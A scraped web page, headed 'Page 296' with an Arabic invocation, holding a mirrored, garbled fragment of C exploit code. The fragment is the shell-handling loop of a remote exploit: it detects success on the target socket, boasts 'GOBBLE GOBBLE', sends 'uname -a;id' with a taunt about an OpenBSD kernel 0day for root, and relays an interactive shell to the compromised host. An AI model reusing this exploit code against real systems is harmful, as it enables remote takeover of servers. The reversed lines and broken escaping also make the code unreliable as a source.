Page 296 - بسم الله الرحمن الرحيم

;(fflush(stdout
                                                                                         } (while (1
                                                                                        ;fd_set fds
                                                                                               ;int n

                                                                               ;struct timeval tv

                                                         ;tv.tv_sec = EXPLOIT_TIMEOUT
                                                                                  ;tv.tv_usec = 0

                                                                               ;(FD_ZERO(&fds
                                                                              ;(FD_SET(0, &fds
                                                                         ;(FD_SET(sock, &fds

                                                               ;((memset(buf, 0, sizeof(buf
                                   } (if(select(sock + 1, &fds, NULL, NULL, &tv) > 0

                                                                 } ((if(FD_ISSET(sock, &fds
                                          (if((n = read(sock, buf, sizeof(buf) - 1)) <= 0

                                                                                              ;break

            } (if(!owned && n >= 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0
                                ;("\\\printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n

                            ;(printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr
sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD local

                                            ;("\\\kernel exploit to gain instant r00t\\\\n
                                                    ;((write(sock, expbuf, strlen(expbuf
                                                                                         ;++owned
                                                                                                      {

                                                                                 ;(write(1, buf, n
                                                                                                      {

                                                                      } ((if(FD_ISSET(0, &fds
                                                 (if((n = read(0, buf, sizeof(buf) - 1)) < 0

                                                                                             ;(exit(1

                                                                            ;(write(sock, buf, n
                                                                                                      {
                                                                                                      {

                                                                                        (if(!owned
                                                                                              ;break
                                                                                                      {

                                                                                    ;(free(expbuf
                                                                                     ;(close(sock

                                                                                         (if(owned
                                                                                           ;return 0

                                                                                 } (if(!bruteforce
